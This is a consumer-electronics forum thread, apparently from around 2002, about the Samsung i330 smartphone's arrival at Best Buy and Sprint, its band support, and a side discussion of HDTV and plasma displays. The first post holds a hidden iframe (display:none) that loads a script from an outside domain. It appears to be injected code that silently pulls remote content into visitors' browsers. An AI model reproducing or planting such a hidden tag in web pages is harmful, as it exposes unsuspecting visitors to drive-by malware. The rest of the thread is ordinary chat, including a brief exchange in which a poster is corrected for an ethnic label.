+ Reply to Thread
Page 1 of 2 1 2 LastLast
    Administrator

FYI: Samsung I330 available at Best Buy.

seems we have more of a choice in smartphones:

http://bestbuy.simplexity.com/produc...sung%20I330%20 :drink3<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

way to break the news Marc! i'll have to go check it out! if you go look let us know what you think :drink1

Originally posted by Robert K.
    way to break the news Marc! i'll have to go check it out! if you go look let us know what you think :drink1
    Looks like it's only a dual mode phone

Shameless

Originally posted by Shameless
    Looks like it's only a dual mode phone

Shameless
    Dual mode(Analog, Digital), tri-band(CDMA 800/1900/Amps)

Administrator
    yeah i need to get my lazy @$$ up and go see if they have it here... :drink3

Originally posted by ConceptVBS
    Dual mode(Analog, Digital), tri-band(CDMA 800/1900/Amps)
    Dual-mode phones work on analog and 800 MHz digital networks.

Dual-band phones work on both 800 MHz digital and 1900 MHz digital networks.

Tri-mode phones work on all three frequencies: 1900 MHz digital, 800 MHz digital or reverting to 800 MHz analog cellular when digital is not available.

Samsung I330 CDMA 800/1900/AMPS

So it looks like they are DUAL-Band phone not tri-mode phones unless I am not understanding it right.

Shameless

Since it works on 800 & 1900 MHz digital IN ADDITON to 800 MHz analog AMPS, it's a tri-mode phone.

Guys, I hate to say it, but the phone is available in my area and I'm thinking of jumping from verizon to sprint (ugh) just to get a 3G color palm phone. The 7135 is going to be better in terms of being a phone FIRST and all, but I'm sick of waiting...

Administrator
    i hear ya brother... come on over to sprint! :drink3

I went to Best Buy (brick and morter) and they didn't have it. The oriental associate was busy talking to an oriental couple so I didn't inquire, however it wasn't on the shelf.

I did get to try out the Zire (just from a Palm investor's prospective). It's cool, notepad ink keeps up with the stylus even tho it's only a 16mhz processor. Sony seems to own the PDA shelf with more models than any other maker (palm or ppc). Looked for the new OS5 Sony nr palm, but didn't see it. Too soon perhaps.

Did my usual walkthrough of the rest of the tech stuff in the store. Same-old-s___. BTW: what's the difference between svideo and svhs? And, while tv makers are touting the clarity of progressive scan digital tv's, how come accurate perspective doesn't matter anymore? I saw same program running on their wall of tv's and see all kinds heads, thick heads, skinny heads, right looking heads, etc. Why don't they configure the damn tv's to show perspective correctly like if the signal is 4:3, show 4:3 on a 16:9 and not stretch it one way or the other. (sorry, incorrect aspect ratio annoys the crap out of me - why would I spend $10k on a plasma HDTV to look at people stretched to fit the screen?)
    David

More Samsung i330 Info?

Anybody got any good links to more info on this phone? I check samsungelectronics.com and found info on the old i300 but not the newer i330.

Personally I think the 7135 is going to be very sweet indeed, but I always like to have researched my options as best I can

Cheers,

Dan

Originally posted by David Westman
    I went to Best Buy (brick and morter) and they didn't have it. The oriental associate was busy talking to an oriental couple so I didn't inquire, however it wasn't on the shelf.
    O.k.,

First of all, it is "Asian", not "Oriental".

Secondly, if the clerk were white, would you have pointed it out to us that he/she, "was busy talking to a caucasian couple so I didn't inquire."?

What, did they have some sort of secret handshake that excluded you?

Administrator
    yeah you kinda stepped on 'kito's toes with that statement...

i dont htink yuo will see them in the store just yet..

for more info on the 1330, visit sphi300.com

in regards to svhs and svideo...

svhs bascially has more lines of resolution thats recorded on a tape than conventional vhs.

the reason they show ,say, 4:3 info on a 16:9 set is because there is virtually no HD programming in existence. i would not really get a HD set until a least a couple more years when the programming gets more readily available...unless you plan on watching DVD's all the time...

plasma is really it, but DLP technology is much better. :drink3

Well, home theater and HDTV is my other hobby, and I must say that while there isn't as much programming in HDTV as I would like, there is a LOT of programming available, and it is definately worth the investment IMHO (you don't need a $10,000 plasma tv, and in fact you will get better performance from a different display type). For a sample of what is on HDTV tonight, go to
    http://schedule.atlantadtv.org/sched/OTA20021015.html. Not to mention that ESPN recently announced an HD channel lanuching in April, and HDNet will be offering 3 new HD channels (supposedly) by the end of the year.

I believe the reason that you don't see correctly configured displays in stores is because the people who set them up don't have a clue what they are doing. They just plug the same source into all tv's and wonder why the widescreen tvs look so funny. All you have to do is go to a salesperson and spend 5 minutes educating them and setting up one display correctly and more times than not they are stunned.

Give HDTV a chance and you will not be disappointed.

Originally posted by Markito Burrito
    O.k.,

First of all, it is "Asian", not "Oriental".

Secondly, if the clerk were white, would you have pointed it out to us that he/she, "was busy talking to a caucasian couple so I didn't inquire."?

What, did they have some sort of secret handshake that excluded you?
    You got me there. Didn't mean any disrespect. I have barged in on a conversation in the past when it appeared to me the prospective buyers reached an impass of indecision. The asian couple were at that point, and I wanted to ask the associate if he knew when the i330 would arrive, but I didn't out of deference. I see now that was an error. I should have ignored the race issue and asked away.
    David

Originally posted by dbroome
    Well, home theater and HDTV is my other hobby, and I must say(you don't need a $10,000 plasma tv, and in fact you will get better performance from a different display type).
    What struck me about that particular tv was the angle viewing. First I thought "hey, that looks pretty good from the side", then I did a 180 degree walk around test. Screen looked exactly the same from every angle. Couldn't say same about other tv's.
    David

Administrator
    Originally posted by David Westman
    What struck me about that particular tv was the angle viewing. First I thought "hey, that looks pretty good from the side", then I did a 180 degree walk around test. Screen looked exactly the same from every angle. Couldn't say same about other tv's.
    thats the beauty of the 180 degree viewing angle of plasma tv's!! in regards to CRT's, i would recommend getting a sony trinitron over any other conventional CRT display. thier 3D digital comb filter and increased luminence makes the HD Experience very pleasing!! :drink3

Yeah, the viewing angle is pretty amazing on those things. And so is that price tag. I just can't belive they have lasted this long with such a high price tag. Give me a goo projector any day for 1/4 the cost and a picture that is much thinner. I guess there is something to be said for the 'cool' factor.

And I guess I am as guilty as the next guy, what with me lurking on a board to read about a phone that may or may not come out this year and will cost more than many TV's

Administrator
    the i330 is now on sprints site..

http://www1.sprintpcs.com/explore/Ph...=1039937787583

spoke with a rep who said i could order one right now (the site says out of stock but his computer showed them in stock). so he gave me the telesales # but they are closed. ill call them tomorrow...

im not really hyped up about this phone since its been rendered obsolete by the newer samsung and kyo phones (the i330 would fit nicely into Vic's "...obsolete..." thread), but atleast its on the sprint site and its the first of the newer smartphones that are on a carrier's site to where we can order it...

While I could get to the i330 by following your link, I can't surf there myself. Guess it's not available in my zipcode yet.
    David

Just noticed the i330 is finally on a sprint web site I can surf to. It's listed as the only dual band under the 'pda and smartphone' category.
    David